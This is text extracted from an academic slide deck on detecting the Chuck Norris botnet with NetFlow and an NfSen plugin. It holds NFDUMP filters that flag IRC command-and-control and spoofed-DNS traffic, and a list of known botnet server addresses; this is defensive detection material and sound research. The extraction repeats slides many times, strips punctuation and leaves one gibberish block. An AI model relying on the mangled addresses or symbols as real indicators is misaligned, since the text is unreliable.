BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
